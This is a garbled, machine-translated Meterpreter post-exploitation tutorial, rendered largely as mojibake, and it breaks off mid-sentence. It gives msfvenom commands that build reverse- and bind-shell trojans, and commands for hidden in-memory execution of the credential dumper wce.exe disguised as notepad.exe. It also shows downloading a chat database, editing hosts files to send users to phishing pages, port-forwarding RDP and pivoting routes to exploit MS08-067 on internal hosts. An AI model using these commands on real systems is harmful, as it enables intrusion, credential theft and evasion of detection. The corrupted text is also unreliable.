0x01pirståŠç¿ã¡ãŒã¿ãŒãã¬ãŒã¿ãŒ
1.1.ã¡ãŒã¿ãŒãã¬ã¿ãŒãšã¯äœã§ãã
MeterPreterã¯ãMetaSploitãã¬ãŒã ã¯ãŒã¯ã®æ¡åŒµã¢ãžã¥ãŒã«ã§ãããªãŒããŒãããŒãæåããåŸãæ»æãã€ããŒããšããŠäœ¿çšãããŸãããªãŒããŒãããŒæ»æãæåããåŸãæ»æãã€ããŒãã¯ã³ã³ãããŒã«ãã£ãã«ãè¿ããŸããæ»æã®ãã€ããŒããšããŠäœ¿çšãããšãã¿ãŒã²ããã·ã¹ãã ã®ã¡ãŒã¿ãŒãã¬ã¿ãŒã·ã§ã«ãžã®ãªã³ã¯ãååŸã§ããŸãã MeterPreter Shellã«ã¯ããŠãŒã¶ãŒã®è¿œå ãäœãã®é ãããŠãŒã¶ãŒã®ãã¹ã¯ãŒãã®éãããªã¢ãŒããã¹ãã®ãã¡ã€ã«ã®ã¢ããããŒããšããŠã³ããŒããCMD.exeã®å®è¡ãç»é¢ã®ãã£ããã£ããªã¢ãŒãã³ã³ãããŒã«ã®ãã£ããã£ãããŒæ å ±ã®ååŸãããŒæ å ±ã®ååŸãã¢ããªã±ãŒã·ã§ã³ã®ã¯ãªã¢ããªã¢ãŒããã¹ãã®ã·ã¹ãã æ å ±ã®è¡šç€ºãªã©ã®ãã·ã³ãªã©ã®ã€ã³ã¿ãŒãã§ãŒã¹ã®è¡šç€ºãªã©ã®è¡šç€ºãªã©ã浞éã¢ãžã¥ãŒã«ãšããŠå€ãã®æçšãªæ©èœããããŸãããªã¢ãŒããã¹ãã«èº«ãé ããšãã·ã¹ãã ããŒããã£ã¹ã¯å ã®ãã¡ã€ã«ã倿ŽãããªããããHIDS [ãã¹ãããŒã¹ã®äŸµå ¥æ€ç¥ã·ã¹ãã ]ãå¿çããããšã¯å°é£ã§ãã In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person.
æåŸã«ãMeterPreterã¯è€æ°ã®ã»ãã·ã§ã³ãäœæããã¿ã¹ã¯ãç°¡çŽ åããããšãã§ããŸãããããã®ã»ãã·ã§ã³ã¯ã浞éã«äœ¿çšã§ããŸãã Metasploitãã¬ãŒã ã¯ãŒã¯ã§ã¯ãMeterPreterã¯æµžéåŸã®ããŒã«ã§ãããåäœäžã«åäœäžã«æ¡åŒµã§ããåçã§ã¹ã±ãŒã©ãã«ãªãã€ããŒãã§ãããã®ããŒã«ã¯ããã¡ã¢ãªDLLã€ã³ãžã§ã¯ã·ã§ã³ãã®æŠå¿µã«åºã¥ããŠå®è£ ãããŠããŸããããã«ãããã¿ãŒã²ããã·ã¹ãã ã¯ãæ°ããããã»ã¹ãäœæããæ³šå ¥ãããDLLãåŒã³åºãããšã«ãããæ³šå ¥ãããDLLãã¡ã€ã«ãå®è¡ã§ããŸãããã®äžã§ãã¿ãŒã²ããããã€ã¹å ã®æ»æè ãšã¡ãŒã¿ãŒãã¬ã¿ãŒãšã®éã®éä¿¡ã¯ãã¹ããŒãžã£ãŒãœã±ãããä»ããŠå®è£ ãããŠããŸããæµžéåŸã¢ãžã¥ãŒã«ãšããŠã¯ã¡ãŒã¿ãŒãã¬ã¿ãŒã«ã¯å€ãã®çš®é¡ããããã³ãã³ãã¯ã³ã¢ã³ãã³ããšæ¡åŒµã©ã€ãã©ãªã³ãã³ãã§æ§æãããŠãããæ»ææ¹æ³ãå€§å¹ ã«æ¿çž®ããŠããŸãã
MeterPreterã説æããå¿ èŠãããå Žåãè匱æ§ãæ£åžžã«æŽ»çšãããåŸãã³ãŒãã®ç¬¬2ãã§ãŒãºãšMeterPreterãµãŒããŒDLLãéä¿¡ãããŸãããããã£ãŠããããã¯ãŒã¯ã®äžå®å®ãªå Žåãå€ãã®å Žåãå®è¡å¯èœãªã³ãã³ãããªãããã»ãã·ã§ã³ã®ç¢ºç«ãšãã«ãã®å®è¡ãæ¬ èœããŠããããšãããããŸããããã¯ãVPNã«æ¥ç¶ããã€ã³ãã©ãããã§PSEXECãšBIND_TCPã䜿çšãããšãã«ãã°ãã°çºçããŸãã
1.2.meterpreterãã¯ãããžãŒã®å©ç¹
MetaSploitã¯ãWindowsãLinuxãªã©ã®ããŸããŸãªäž»æµãã©ãããã©ãŒã ã®ã¡ãŒã¿ãŒãã¬ã¿ãŒããŒãžã§ã³ãæäŸããX86ããã³X64ãã©ãããã©ãŒã ããµããŒãããŠããŸããããã«ãMeterPreterã¯PHPèšèªãšJavaèšèªã«åºã¥ããå®è£ ãæäŸããŠããŸãã MeterPreterã®äœæ¥ã¢ãŒãã¯çŽç²ãªã¡ã¢ãªã§ãããå©ç¹ã¯èµ·åããŠé ãããŠããããšã§ããããã¯ããŠã€ã«ã¹å¯ŸçãœãããŠã§ã¢ã§ç£èŠããããšãå°é£ã§ããã¿ãŒã²ãããã¹ããã£ã¹ã¯ã«ã¢ã¯ã»ã¹ããå¿ èŠã¯ãªããããäŸµå ¥ã®å åã¯ãããŸãããäžèšã«å ããŠãMeterPreterã¯Ruby Scripting ExtensionsããµããŒãããŠããŸãããããã£ãŠãã«ããŒèšèªã¯ãŸã å¿ èŠã§ãã
0x02ã¡ãŒã¿ãŒãã¬ãŒã¿ãŒã®äžè¬çãªãªããŠã³ãã¿ã€ã
1.Reverse_TCP
ããã¯TCPããŒã¹ã®ããã¯ãªã³ã¯ãªããŠã³ãã·ã§ã«ã§ããã䜿çšããã®ãéåžžã«å®å®ããŠããŸã
ïŒ1ïŒLinuxïŒ
次ã®ã³ãã³ãã䜿çšããŠãLinuxã®äžã§ãªããŠã³ãã·ã§ã«ããã€ã®æšéЬãçæããŸãã
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell
äžã®åçãèŠããšãTrojanãã¡ã€ã«ã®ISShellããã£ã¬ã¯ããªã§æ£åžžã«çæãããŠããããšãããããŸããæ¬¡ã«ããã¡ã€ã«ã«å®è¡å¯èœãªæš©éã远å ããŸããæ¬¡ã«ãMetaSploitãéããã¢ãžã¥ãŒã«ãã³ãã©ãŒã䜿çšããŠããã€ããŒããèšå®ããŸããæ³šïŒããã®ãã€ããŒãã»ããã¯ãããã€ã®æšéЬãçæããããã«äœ¿çšãããã€ããŒããšåãã§ãªããã°ãªããŸããã
ã¢ãã¬ã¹ãšããŒããèšå®ãããšããªã¹ãã³ã°ãéå§ããŸã
ããã§ãªããŠã³ãã·ã§ã«ããã€ã®æšéЬãå®è¡ãããšãã·ã§ã«ã«ãªããŠã³ããããããšãããããŸãã
ïŒ2ïŒWindowsïŒ
msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oãã¡ã€ã«åãçæãã
MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE
ãªããŒã¹æ¥ç¶ã·ã§ã«ã¯äœ¿çšããã®ãéåžžã«å®å®ããŠãããããLHOSTãèšå®ããå¿ èŠããããŸã
2.Reverse_http
HTTPã¡ãœããã«åºã¥ã鿥ç¶ã¯ããããã¯ãŒã¯é床ãé ãå Žåãäžå®å®ã§ãã
payload:/windows/meterpreter/reverse_http
3.Reverse_Https
HTTPSã¡ãœããã«åºã¥ã鿥ç¶ã¯ããããã¯ãŒã¯é床ãé ãå Žåãäžå®å®ã§ãã HTTPSããªããŠã³ãããå Žåã¯ããªã¹ãã³ã°ããŒãã443ã«å€æŽããŠã¿ãŠãã ããã
payload:/windows/meterpreter/reverse_https
4.bind_tcp
ããã¯ãTCPã«åºã¥ããã©ã¯ãŒãæ¥ç¶ã·ã§ã«ã§ããã€ã³ãã©ãããããããã¯ãŒã¯ã»ã°ã¡ã³ããæšªæããŠãããšãã«æ»ææ©ã«æ¥ç¶ã§ããªããããã€ã³ãã©ãããã§ãã䜿çšãããLHOSTã®èšå®ãå¿ èŠãšããŸããã
次ã®ã³ãã³ãã䜿çšããŠãããã€ã®æšéЬãçæããŸãã
msfvenom -p linux/x86/meterpreter/bind_tcp
lport=4444 -f elf -o shell
åãããšã¯ãæš©éã§å®è¡ããããã¢ã³ã¹ãã¬ãŒã·ã§ã³ã¯ãããŸããã
ããã§ãèšå®ããIPã¢ãã¬ã¹ãšããŒãã¯ã¿ãŒã²ãããã·ã³ããã®ãã®ã§ããããšã«æ³šæããŠãã ããããããç§ãã¡ããããã€ãªãããã«ã€ãã·ã¢ããããšããã®ã ããã§ãã
0x03é¢é£ãã€ããŒã
ãã€ããŒãã«ã¯ããªã¢ãŒãã·ã¹ãã ã§å®è¡ããå¿ èŠãããæªæã®ããã³ãŒããå«ãŸããŠããŸãã Metasploitã§ã¯ããã€ããŒãã¯ã¢ãžã¥ãŒã«ãæªçšããããã«å®è¡ã§ããç¹å¥ãªã¢ãžã¥ãŒã«ã§ãããã¿ãŒã²ããã·ã¹ãã ã®ã»ãã¥ãªãã£ã®è匱æ§ã掻çšããŠæ»æãå®è£ ã§ããŸããèŠããã«ããã®ãšã¯ã¹ããã€ãã¢ãžã¥ãŒã«ã¯ã¿ãŒã²ããã·ã¹ãã ã«ã¢ã¯ã»ã¹ã§ãããã®ã³ãŒãã¯ã¿ãŒã²ããã·ã¹ãã ã§ã®ãã€ããŒãã®åäœãå®çŸ©ããŸãã
Metasploitã«ã¯ããã€ããŒãã¢ãžã¥ãŒã«ã«ã¯3ã€ã®äž»èŠãªã¿ã€ãããããŸãã
-ã·ã³ã°ã«
- ã¹ã¿ãŒã¬ãŒ
-ã¹ããŒãž
ã·ã³ã°ã«ã¯å®å šã«ç¬ç«ãããã€ããŒãã§ãããã·ã¹ãã ãŠãŒã¶ãŒã®è¿œå ããã¡ã€ã«ã®åé€ãªã©ãcalc.exeãå®è¡ããã®ãšåããããç°¡åã§ããã·ã³ã°ã«ã®ãã
ãã€ããŒãã¯å®å šã«ç¬ç«ããŠãããããNetCatã®ãããªéã¡ã¿ããã€ãåŠçããŒã«ã«æãŸãããšããããŸãã
Stager Payloadsã¯ãã¿ãŒã²ãããŠãŒã¶ãŒã𿻿è éã®ãããã¯ãŒã¯æ¥ç¶ã確ç«ãã远å ã®ã³ã³ããŒãã³ããŸãã¯ã¢ããªã±ãŒã·ã§ã³ãããŠã³ããŒããã責任ããããŸããäžè¬çãªã¹ããŒãžã£ãŒã®ãã€ããŒãã¯Reverse_TCPã§ããããã«ãããã¿ãŒã²ããã·ã¹ãã ã¯æ»æè ãšã®TCPæ¥ç¶ã確ç«ã§ããŸããå¥ã®äžè¬çãªã¿ã€ãã¯bind_tcpã§ããããã«ãããã¿ãŒã²ããã·ã¹ãã ã¯TCPãªã¹ããŒãæå¹ã«ããæ»æè ã¯ãã€ã§ãã¿ãŒã²ããã·ã¹ãã ãšéä¿¡ã§ããŸãã
ã¹ããŒãžã¯ã¹ããŒãžã£ãŒã§ã
ãã€ããŒãã«ãã£ãŠããŠã³ããŒãããããã€ããŒãã³ã³ããŒãã³ããã®ãã€ããŒãã¯ããµã€ãºå¶éãªãã§ããé«åºŠãªæ©èœãæäŸã§ããŸãã
Metasploitã§ã¯ããã€ããŒãã®ååãšäœ¿çšããã圢åŒã§ãã®ã¿ã€ããæšæž¬ã§ããŸãã
åäžãã€ããŒãã®åœ¢åŒã¯ã¿ãŒã²ãã/ã·ã³ã°ã«ã§ã
ã¹ãã€ã¬ãŒ/ã¹ããŒãžãã€ããŒã圢åŒã¯ãã¿ãŒã²ãã/ã¹ããŒãž/ã¹ãã€ã¬ãŒã§ã
Metasploitã§ãPayloadsã衚瀺ãã³ãã³ããå®è¡ãããšãå©çšå¯èœãªãã€ããŒãã®ãªã¹ãã衚瀺ãããŸãã
ãã®ãªã¹ãã§ã¯ãWindows/PowerShell_Bind_TCPã¯åäžã®ãã€ããŒãã§ãããã¹ããŒãžã®ãã€ããŒãã¯å«ãŸããŠããŸããã Windows/x64/meterpreter/reverse_tcpã¯ã¹ãã€ã¬ãŒã§ã
ãã€ããŒãïŒReverse_TCPïŒãšã¹ããŒãžãã€ããŒãïŒMeterPreterïŒã
0x04ã¡ãŒã¿ãŒãã¬ãŒã¿ãŒã®å ±éã³ãã³ã
1ãåºæ¬ã³ãã³ã
ãã«ãïŒMeterPreterãã«ãã確èªããŠãã ãã
ããã¯ã°ã©ãŠã³ãïŒè¿åããã³ã°ã¡ãŒã¿ãŒãã¬ã¿ãŒã®èæ¯
BGKILLïŒããã¯ã°ã©ãŠã³ãã¡ãŒã¿ãŒãã¬ãŒã¿ãŒã¹ã¯ãªãããæ®ºããŸã
BGLISTïŒã¯ãå®è¡äžã®ãã¹ãŠã®ããã¯ã°ã©ãŠã³ãã¹ã¯ãªããã®ãªã¹ããæäŸããŸã
bgrunïŒããã¯ã°ã©ãŠã³ãã¹ã¬ãããšããŠã¹ã¯ãªãããå®è¡ããŸã
ãã£ã³ãã«ïŒã¢ã¯ãã£ããã£ãã«ã衚瀺ããŸã
ã»ãã·ã§ã³-içªå·ïŒã»ãã·ã§ã³ãšå¯Ÿè©±ããŸããçªå·ã¯nçªç®ã®ã»ãã·ã§ã³ãæå³ããŸããã»ãã·ã§ã³-iã䜿çšããŠãæå®ãããã·ãŒã±ã³ã¹çªå·ã«ã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ã«æ¥ç¶ãç¶ããŠããŸãã
ã»ãã·ã§ã³-Kçªå·
#interact with Conversation
ïŒã¯ããŒãºãã£ã³ãã«ãéããŸã
çµäºïŒã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ãçµäºããŸã
QUITïŒã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ãçµäºããŸã
ID #switchããã£ã³ãã«ã«æäœããŸã
ïŒæ¢åã®ã¢ãžã¥ãŒã«ãå®è¡ããŸããããã§èšãããã®ã¯ãèµ°è¡ããŠã¿ãã2åã¯ãªãã¯ããåŸãæ¢åã®ãã¹ãŠã®ã¹ã¯ãªãããäžèŠ§è¡šç€ºããããšããããšã§ããäžè¬çã«äœ¿çšããããã®ã«ã¯ãAutorouteãHashdumpãarp_scannerãmulti_meter_injectãªã©ãå«ãŸããŸãã
IRBïŒRubyã¹ã¯ãªããã¢ãŒããå ¥åããŸã
ïŒãã£ãã«ã®ããŒã¿ãèªã
ïŒwrite data fort data fo a Channel
MeterPreterã¹ã¯ãªãããéžæããåŸãå®è¡ããã³bgrunïŒåæ¯ãšèæ¯å®è¡
MeterPreterã®æ¡åŒµæ©èœãããŒãããïŒã䜿çšããŸã
ïŒããŒãã¢ãžã¥ãŒã«ãããŒã/䜿çšããŸã
ãªãœãŒã¹ïŒæ¢åã®RCã¹ã¯ãªãããå®è¡ããŸã
2ããã¡ã€ã«ã·ã¹ãã ã³ãã³ã
CAT C: \ boot.iniïŒãã¡ã€ã«ã®å 容ã衚瀺ãããšããã¡ã€ã«ãååšããå¿ èŠããããŸã
del C: \ boot.ini #deleteæå®ããããã¡ã€ã«
upload /root/desktop/netcat.exe c: \ïŒsetup.exeã®ã¢ããããŒããªã©ããã¡ã€ã«ãã¿ãŒã²ããææè ã«ã¢ããããŒãããŸã
c: \\ windows \\ system32 \
nimeia.txt/root/desktop/ïŒããŠã³ããŒãïŒc: \\ boot.ini/root/ãŸãã¯ããŠã³ããŒããªã©ããã¡ã€ã«ããã·ã³ã«ããŠã³ããŒãããŠãã ãã
c: \\ 'programfiles' \\ tencent \\ qq \\ users \\ 295 ****** 125 \\ msg2.0.db
/æ ¹/
ç·šéc: \ boot.iniïŒ
ãã¡ã€ã«ãç·šéããŸã
getLWDïŒããŒã«ã«ãã£ã¬ã¯ããªãå°å·ããŸã
getwdïŒprintäœæ¥ãã£ã¬ã¯ããª
LCDïŒããŒã«ã«ãã£ã¬ã¯ããªã倿ŽããŸã
LSïŒçŸåšã®ãã£ã¬ã¯ããªã®ãã¡ã€ã«ã®ãªã¹ãããªã¹ãããŸã
LPWDïŒããŒã«ã«ãã£ã¬ã¯ããªãå°å·ããŸã
PWDïŒåºåäœæ¥ãã£ã¬ã¯ããª
CD C: \\ #enterãã£ã¬ã¯ããªãã¡ã€ã«
RMãã¡ã€ã«#Deleteãã¡ã€ã«
MKDIR DIER #Create Directoryã®è¢«å®³è ã·ã¹ãã
RMDIRïŒè¢«å®³è ã·ã¹ãã ã«é¢ããé ä¿¡ãã£ã¬ã¯ããª
dirïŒã¿ãŒã²ãããã¹ãã®ãã¡ã€ã«ãšãã©ã«ããŒæ å ±ããªã¹ã
MVïŒã¿ãŒã²ãããã¹ãã®ãã¡ã€ã«åã倿ŽããŸã
æ€çŽ¢-D d: \\ www -f web.config #searchãã¡ã€ã«ãd c: \\ -f*.docãªã©
MeterPreter Search -F AutoExec.BAT #Search FILEã®Search
MeterPreter Search -F Sea*.BAT C: \\ XAMP \\
enumdesktops #Number of User Logins
ïŒ1ïŒãã¡ã€ã«ãããŠã³ããŒãããŸã
ã³ãã³ããããŠã³ããŒã +ãã¡ã€ã«ãã¹ãã䜿çšããŠãã¿ãŒã²ãããã·ã³ã®å¯Ÿå¿ããæš©éã®ãã¹ã®äžã«ãã¡ã€ã«ãããŠã³ããŒãããŸã
ïŒ2ïŒãã¡ã€ã«ãã¢ããããŒãããŸã
ãã¢ããããŒããã³ãã³ãã¯ããã¡ã€ã«ãã¿ãŒã²ãããã·ã³ã«ã¢ããããŒãããããšã§ããå³ã§ã¯ãLL.TXTãã¿ãŒã²ãããã·ã³ã®C: \ PP \ã«ã¢ããããŒãããŸããã
ïŒ3ïŒãã¡ã€ã«ã衚瀺ããŸã
ãCat Filenameãã¯ãçŸåšã®ãã£ã¬ã¯ããªã®ãã¡ã€ã«ã³ã³ãã³ãã衚瀺ããŸããã³ãã³ããå ¥åããåŸã衚瀺ããŠãããã¡ã€ã«ã®ã³ã³ãã³ããè¿ããŸãã
ïŒ4ïŒçŸåšã®ãã¹ãåãæ¿ããŠç §äŒããŸã
ãPWDãã³ãã³ãã¯ãDOSã³ãã³ãã®äžã®çŸåšã®ãã¹ãç §äŒããŸãã ãCDãã³ãã³ãã¯ãäžã®å³ã«ç€ºãããã«ãçŸåšã®ãã¹ã倿Žã§ããŸããCD.ã¯ãçŸåšã®ãã¹ã®äžã®åã®ãã£ã¬ã¯ããªã«åãæ¿ããããšã§ãã
ïŒ5ïŒãsysinfoãã³ãã³ã
ãsysinfoãã³ãã³ãã¯ããªã¢ãŒããã¹ãã®ã·ã¹ãã æ å ±ã衚瀺ããã³ã³ãã¥ãŒã¿ãŒãã·ã¹ãã æ å ±ãæ§é ãèšèªããã®ä»ã®æ å ±ã衚瀺ããŸãããªã¢ãŒããã¹ãã®ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã¯Windows XP Service Pack 2ã§ããããã®ã·ã¹ãã ã«ã¯å€ãã®è匱æ§ãããããšãããããŸãã
ïŒ6ïŒã³ãã³ããå®è¡ããŸã
ãå®è¡ãã³ãã³ãã¯ãã¿ãŒã²ãããã¹ãã®ã³ãã³ããå®è¡ããŸããããã§ããexecute -Hãããã«ãæ å ±ã衚瀺ããŸãã -fã¯ãå®è¡ããã³ãã³ããå®è¡ããããšã§ãã
ã¿ãŒã²ãããã¹ãã§ããã°ã©ã ãå®è¡ããŸããããšãã°ãçŸåšããã»ã¹ãExplorer.exeã«æ³šå ¥ããåŸãå®è¡ãŠãŒã¶ãŒã¯ã¹ãŒããŒãããŒãžã£ãŒç®¡çè ã§ã
ã¿ãŒã²ãããã¹ãã§ã¡ã¢åž³ããã°ã©ã ãå®è¡ããŸããã
execute -fnotepad.exe
äžã®å³ã«ç€ºãããã«ãã¡ã¢åž³ããã°ã©ã ãã¿ãŒã²ãããã¹ãã«ããã«è¡šç€ºãããŸãïŒããã¯ããŸãã«ãæçœã§ããããã¯ã°ã©ãŠã³ãå®è¡ãé衚瀺ã«ããå Žåã¯ããã©ã¡ãŒã¿ãŒ-Hã远å ããŸã
execute -h -fnotepad.exe
ãã®æç¹ã§ãã¿ãŒã²ãããã¹ãã®ãã¹ã¯ãããã¯å¿çããŸããã§ããããMeterPreterã»ãã·ã§ã³ã§PSã³ãã³ãã䜿çšããŠãããèŠãŸãã
å¥ã®ãã®ãèŠãŠãã ãããã¿ãŒã²ãããã¹ãã§CMD.exeããã°ã©ã ãå®è¡ããé ãããæ¹æ³ã§ã¡ãŒã¿ãŒãã¬ãŒã¿ãŒã»ãã·ã§ã³ã§çŽæ¥å¯Ÿè©±ããŸãã
泚æïŒ
execute -h -i -fcmd.exe
ããã¯ãã·ã§ã«ã³ãã³ãã䜿çšããã®ãšåã广ãéæããŸã
ãã1ã€ã®ããšã¯ãã¿ãŒã²ãããã¹ãã®ã¡ã¢ãªã§WCE.EXEãTrojanãªã©ã®ã¿ãŒã²ãããã¹ãã®æ»æããã°ã©ã ãçŽæ¥å®è¡ããŠãã¿ãŒã²ãããã¹ãã®ããŒããã£ã¹ã¯ã§çºèŠãŸãã¯æ®ºãããããšãé¿ããããã§ãã
execute -h -m -d notepad.exe -f wce.exe -a
'-owce.txt'
-dã¿ãŒã²ãããã¹ããå®è¡ããããšãã«è¡šç€ºãããããã»ã¹åïŒå€è£ ã®ããïŒ
-mã¡ã¢ãªããçŽæ¥å®è¡ããŸã
'-owce.txt'ã¯ãwce.exeã®å®è¡ãã©ã¡ãŒã¿ãŒã§ã
ïŒ7ïŒIDLETIMEã³ãã³ã
ãidletimeãã³ãã³ãã¯ãã¿ãŒã²ãããã·ã³ãçŸåšã®æäœãªãã³ãã³ãã«æéåãã«ãªã£ãæéã衚瀺ããŸããå³ã®ãã£ã¹ãã¬ã€ã¯ãã¿ãŒã²ãããã¹ãã9å19ç§åã«æäœãè¡ãããšãæå³ããŸãã
ïŒ8ïŒã³ãã³ããæ€çŽ¢ããŸã
ãæ€çŽ¢ãã³ãã³ãã¯ãã¿ãŒã²ãããã¹ãã®ç¹å®ã®ãã¡ã€ã«ãæ€çŽ¢ããŸãããã®ã³ãã³ãã¯ãã·ã¹ãã å šäœãŸãã¯ç¹å®ã®ãã©ã«ããŒãæ€çŽ¢ã§ããŸãã
ãæ€çŽ¢-Hãã³ãã³ãã䜿çšããŠãæ€çŽ¢ã³ãã³ãã®ãã«ãæ å ±ã衚瀺ããŸãã
以äžã®å³ã§ã¯ããæ€çŽ¢âF aa.txtãã³ãã³ãã¯ãçŸåšã®ãã£ã¬ã¯ããªã«aa.txtãã¡ã€ã«ãšã¿ãŒã²ãããã·ã³ã®çŸåšã®ãã£ã¬ã¯ããªã®ãµããã£ã¬ã¯ããªããããã©ããã確èªããŸãããããããªããããã¯ãã®éã瀺ããŸãã
ãæ€çŽ¢-f l*.txt C: \\ ppãã¯ãC: \\ ppã®Lã§å§ãŸããã¹ãŠã®TXTãã¡ã€ã«ãšãPPãã©ã«ããŒã®äžã®ãã¹ãŠã®ãµããã¡ã€ã«ã衚瀺ããŸãããã®ãããªãã¡ã€ã«ãããå Žåããã¹ãšãµã€ãºãè¿ããŸãã
ïŒ9ïŒã³ãã³ããç·šéããŸã
VIãšãã£ã¿ãŒã«é»è©±ããŠãã¿ãŒã²ãããã¹ãã®ãã¡ã€ã«ã倿Žãã
ããšãã°ãã¿ãŒã²ãããã¹ãã®ãã¹ããã¡ã€ã«ã倿ŽããŠãã¿ãŒã²ãããã¹ããBaiduã«ã¢ã¯ã»ã¹ãããšãã«æºåããããã£ãã·ã³ã°Webãµã€ãã«ç§»åããããã«ããŸãïŒå®éšç®çã®ã¿ïŒ
ping www.baidu.comã¿ãŒã²ãããã¹ãã§ã¯ãåºãŠããã¿ãŒã²ããIPã¯192.168.1.1ã§ãã倿ŽããŸãã
3ããããã¯ãŒã¯ã³ãã³ã
ipconfig/ifconfigïŒIPã¢ãã¬ã¹ãå«ããããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ã«é¢ããéèŠãªæ å ±ã衚瀺ããŸã
portfwd -h
äœ¿çšæ³ïŒportfwd [-h] [add | delete | list | flush] [args]
ãªãã·ã§ã³ïŒ
-lããŒã«ã«ãã¹ãããªããããŠèŽãïŒãªãã·ã§ã³ïŒ
-hãã«ããããŒ
-lèŽãããã«ããŒã«ã«ããŒããéžæããŸã
-p OPTã¯ãªã¢ãŒãããŒãã«æ¥ç¶ããŸã
-rãªã¢ãŒããã¹ããéžæããŠæ¥ç¶ããŸã
portfwd add -l
4444 -P 3389 -R 192.168.1.102ïŒããŒã転éãããŒã«ã«ç£èŠ4444ãã¿ãŒã²ãããã·ã³3389ãããŒã«ã«4444ã«è»¢é
netstat -an | grep "4444 '#viewæå®ãããããŒãã®éå£éš
rdesktop -U Administrator -P BKïŒ123 127.0.0.1:444444444444 #use rdesktop desktopã-u username -pãã¹ã¯ãŒãã«æ¥ç¶ãã
rdesktop 127.1.1.0:4444 #requiresãŠãŒã¶ãŒåãšãã¹ã¯ãŒãããªã¢ãŒãã§æ¥ç¶ããŸã
ã«ãŒãïŒè¢«å®³è ã«ãŒãã£ã³ã°ããŒãã«ã衚瀺ãŸãã¯å€æŽããŸã
ã«ãŒã远å 192.168.1.0 255.255.255.0 1 #ADDãã€ãããã¯ã«ãŒã
ã«ãŒãããªã³ã#RoutingããŒãã«åºå
runget_local_subnetsïŒã¿ãŒã²ãããã¹ãã®ã€ã³ãã©ãããIPã»ã°ã¡ã³ãã¹ããŒã¿ã¹
ARPïŒARPãããã¡ãŒããŒãã«ã®ã«ãã¯
GetProxy #Get Proxy
ïŒ1ïŒportfwd
ãããã¯ãŒã¯ã³ãã³ããªã¹ãIPæ å ±ïŒIPConfigïŒãã«ãŒãã£ã³ã°ããŒãã«ã®å€æŽïŒã«ãŒãïŒãããã³ããŒã転éïŒPORTFWDïŒã衚瀺ããŸããããšãã°ãportfwdïŒ
ã«ãŒã«ã確ç«ããåŸããªã¢ãŒã3389ããŒãã転éãããããã«ãããŒã«ã«3344ããŒãã«æ¥ç¶ã§ããŸãã
ïŒ2ïŒã«ãŒã
Routeã³ãã³ãã䜿çšããŠãMeterPreterã»ãã·ã§ã³ã§ã€ã³ãã©ããããããã«è²«éããŸããã¡ãŒã¿ãŒãã¬ã¿ãŒã®ãªããŠã³ãã»ãã·ã§ã³ãåé€ããŠçæãããã¹ãã¯ãã€ã³ãã©ãããããå€ããŠããå¯èœæ§ããããŸããå€ã«ãããã®å±€ããããŸããã€ã³ãã©ãããã®ä»ã®ãã¹ãã«å¯Ÿããæ»æãçŽæ¥èµ·åããããšã¯ã§ããŸãããæ¬¡ã«ãçæãããã¡ãŒã¿ãŒãã¬ã¿ãŒã»ãã·ã§ã³ãã«ãŒãã£ã³ã°ã¹ããªã³ã°ããŒããšããŠäœ¿çšããŠãã€ã³ãã©ãããã®ä»ã®ãã¹ããæ»æã§ããŸãã
æåã«runget_local_subnetsã³ãã³ãã䜿çšããŠãæ®åœ±ãããã¿ãŒã²ãããã¹ãã®ã€ã³ãã©ãããIPã»ã°ã¡ã³ãã衚瀺ã§ããŸãã
ã³ãã³ãïŒget_local_subnetsãå®è¡ããŸã
äžã®å³ã«ç€ºãããã«ïŒ
ãã®ã€ã³ãã©ãããã«ã¯192.168.249.0/24ãããã¯ãŒã¯ã»ã°ã¡ã³ãããããŸãããçŽæ¥ã¢ã¯ã»ã¹ã§ããŸããã
ã«ãŒããããŸããããæ¬¡ã®ãããã¯ãçŸåšååŸãããã¹ãã®ã»ãã·ã§ã³ïŒçŸåš5ïŒã§ããã€ãŸãã249ãããã¯ãŒã¯ã»ã°ã¡ã³ãã®ãã¹ãŠã®æ»æãã©ãã£ãã¯ã¯ãäŸµå ¥ããã¿ãŒã²ãããã¹ãã®ã¡ãŒã¿ãŒãã¬ãŒã¿ãŒã»ãã·ã§ã³ã«ééããŸãã
ã³ãã³ãïŒã«ãŒã远å 192.168.249.0
255.255.255.0 5
次ã«ãã«ãŒãããªã³ãã䜿çšããŠã«ãŒãã£ã³ã°ããŒãã«ã衚瀺ããŸããå¹æã¯æ¬¡ã®ãšããã§ãã
æåŸã«ããã®ã«ãŒãã䜿çšããŠããã®ã«ãŒããä»ããŠ249ãããã¯ãŒã¯ã»ã°ã¡ã³ãã®MS08-067ã®è匱æ§ãåããå¥ã®ãã¹ããæ»æããäžã®å³ã«ç€ºãããã«ãå¥ã®ã€ã³ãã©ããããã¹ã192.168.249.1ãæ£åžžã«ååŸã§ããŸãã
ã»ãšãã©ã®å ŽåãMeterPRãååŸããŸã